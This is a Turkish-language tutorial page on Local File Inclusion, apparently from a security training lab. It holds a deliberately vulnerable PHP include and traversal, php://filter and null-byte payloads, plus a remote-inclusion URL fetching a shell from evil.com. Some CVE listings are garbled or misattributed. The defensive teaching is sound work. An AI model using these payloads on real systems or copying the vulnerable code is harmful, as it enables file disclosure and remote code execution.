Yerel Dosya Dahil Etme (Local File Inclusion - LFI)

Local File Inclusion (LFI), web uygulamalarında dosya dahil etme mekanizmalarının güvensiz kullanımından kaynaklanan kritik bir zafiyettir. Saldırganlar, kullanıcı girdilerini manipüle ederek sunucudaki hassas dosyalara erişebilir ve uzaktan kod çalıştırabilir.

KRİTİK CİDDİYETOWASP Top 10 #1CWE-985 Teknik

🧪 İnteraktif LFI Lab

Bir LFI tekniği seçin ve dosya dahil etme saldırılarını güvenli ortamda pratik yapın

LFI Saldırı Türü Seçin

Farklı LFI vektörlerini pratik yapmak için bir saldırı tekniği seçin

📁

Temel LFI

Herhangi bir filtreleme veya koruma olmadan basit dosya dahil etme

Başlangıç1 attacks

🔄

Dizin Gezinme

Web kökü dışındaki dosyalara erişmek için yol gezinme dizileri kullanma

Orta1 attacks

⚡

Null Byte Enjeksiyonu

Null byte'lar kullanarak dosya uzantısı kısıtlamalarını atlama

İleri1 attacks

🔓

Filtre Atlama

Yaygın LFI filtreleri ve korumalarını atlama

Uzman1 attacks

🌐

Uzak Dosya Dahil Etme

Uzak sunuculardan dosya dahil etme

Uzman1 attacks

📖

Hızlı Referans

Çalışırken her zaman kullanılabilir

⚠️Önemli LFI CVE'leri (2024-2025)

CVE-2024-238979.8

Jenkins - CLI komut parser'ında path traversal yoluyla rastgele dosya okuma

→ Uzaktan kod çalıştırma ve kimlik bilgisi hırsızlığı

CVE-2024-45779.8

PHP CGI - LFI/RCE'ye yol açan argüman enjeksiyonu

→ Tam sistem ele geçirme

CVE-2024-273488.8

Apache HugeGraph - Dosya yüklemede path traversal

→ Rastgele dosya erişimi ve veri sızdırma

CVE-2024-63878.1

OpenSSH - RegreSSHion RCE zafiyeti

→ Kimlik doğrulamasız uzaktan kod çalıştırma

🔥OWASP Top 10

Sıralama:#1

Path Traversal, OWASP Top 10 2021 #1'in (Broken Access Control) bir parçasıdır. Uygulamaların %25'inde kritik seviyede.

📊Kritik İstatistikler

Savunmasız Web Uygulamaları:~25%

Ortalama CVSS Skoru:8.5

Genellikle YÜKSEK veya KRİTİK olarak derecelendirilir

RCE Riski:CRITICAL

Uzaktan kod çalıştırmaya yol açabilir

🛡️Hızlı Koruma

✓Dosya yolları için allowlist kullan (sadece whitelist)
✓Tüm kullanıcı girdilerini sanitize et ve doğrula
✓realpath() kullanarak yolu çöz ve ana dizini kontrol et
✓Tehlikeli PHP fonksiyonlarını devre dışı bırak (allow_url_include)
✓Uygun dosya izinleri ve erişim kontrolleri uygula
✓Güvenlik header'ları kullan ve dizin listelemeyi devre dışı bırak

📚Kaynaklar

VulnSign Path Traversal

📚 LFI Öğren & Ustalaş

Teori, bypass teknikleri, gerçek dünya örnekleri ve koruma stratejilerini kapsayan kapsamlı rehber

TEMELLER

📁

Local File Inclusion (LFI) Nedir?

Local File Inclusion (LFI), saldırganların yerel dosya sisteminden dosyaları dahil etmesine ve çalıştırmasına izin veren bir zafiyettir. Bu, uygulamaların kullanıcı girdisine dayalı olarak dosyaları dinamik olarak dahil ettiğinde, uygun doğrulama olmadan ortaya çıkar ve potansiyel olarak hassas verileri açığa çıkarır veya uzaktan kod çalıştırmayı mümkün kılar.

MEKANİZMA

⚡

Nasıl Çalışır

Bir uygulama, doğrulama olmadan kullanıcı girdisine dayalı olarak dosyaları dahil ettiğinde, saldırganlar yolu manipüle ederek rastgele dosyalara erişebilir. Yaygın hedefler arasında /etc/passwd, yapılandırma dosyaları, log dosyaları ve hatta log poisoning veya PHP wrapper'lar yoluyla RCE elde etme bulunur.

❌ Güvensiz Kod

php

// Vulnerable PHP code
<?php
$page = $_GET['page'];
include("/var/www/pages/" . $page);
?>

// Attacker payload:
// ?page=../../../../etc/passwd
// ?page=php://filter/convert.base64-encode/resource=config.php

✅ Güvenli Kod

php

// Secure PHP code
<?php
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';

if (in_array($page, $allowed)) {
    include("/var/www/pages/{$page}.php");
} else {
    include("/var/www/pages/error.php");
}
?>

TİPLER

📂

Dosya Dahil Etme Türleri

📁 Temel LFI

Herhangi bir filtreleme veya koruma olmadan basit dosya dahil etme

?file=/etc/passwd

🔀 Dizin Gezinme

Web kökü dışındaki dosyalara erişmek için yol gezinme dizileri kullanma

?file=../../etc/passwd

🔓 Null Byte Enjeksiyonu

Null byte'lar kullanarak dosya uzantısı kısıtlamalarını atlama

?file=../../etc/passwd%00

🌐 Uzak Dosya Dahil Etme

Uzak sunuculardan dosya dahil etme

?file=http://evil.com/shell.txt

ETKİ

💥

Ne Olabilir?

🔴Hassas Veri İfşası: /etc/passwd, veritabanı yapılandırmaları, API anahtarları ve kimlik bilgilerine erişim
🟠Kaynak Kod İfşası: Uygulama kaynak kodunu okuma, iş mantığını ve ek zafiyetleri ortaya çıkarma
🟡Uzaktan Kod Çalıştırma: Log poisoning, PHP wrapper'lar veya session dosyası manipülasyonu yoluyla
🔴Tam Sistem Ele Geçirme: RCE ve yetki yükseltme yoluyla sunucunun tamamen ele geçirilmesi

EN İYİ UYGULAMALAR

🛡️

LFI Nasıl Önlenir

✓İzin Listeleri Kullan: Sadece izin verilen dosya adlarını/yollarını beyaz listeye al, asla engelleme listelerine güvenme
✓Girdi Doğrulama: Tüm kullanıcı girdilerini sanitize et ve doğrula, path traversal dizilerini reddet
✓realpath() Kullan: Gerçek yolu çöz ve izin verilen dizin içinde olduğunu doğrula
✓PHP Fonksiyonlarını Devre Dışı Bırak: allow_url_include=Off yap, URL'lerde file_get_contents'i devre dışı bırak
✓En Az Yetki İlkesi: Web sunucusunu minimum dosya sistemi izinleriyle çalıştır
✓İzleme & Loglama: Dosya erişim denemelerini logla, şüpheli kalıpları izle

GERÇEK DÜNYA

🎯

Ünlü Saldırı

// Vulnerable PHP code <?php $page = $_GET['page']; include("/var/www/pages/" . $page); ?> // Attacker payload: // ?page=../../../../etc/passwd // ?page=php://filter/convert.base64-encode/resource=config.php

// Secure PHP code <?php $allowed = ['home', 'about', 'contact']; $page = $_GET['page'] ?? 'home'; if (in_array($page, $allowed)) { include("/var/www/pages/{$page}.php"); } else { include("/var/www/pages/error.php"); } ?>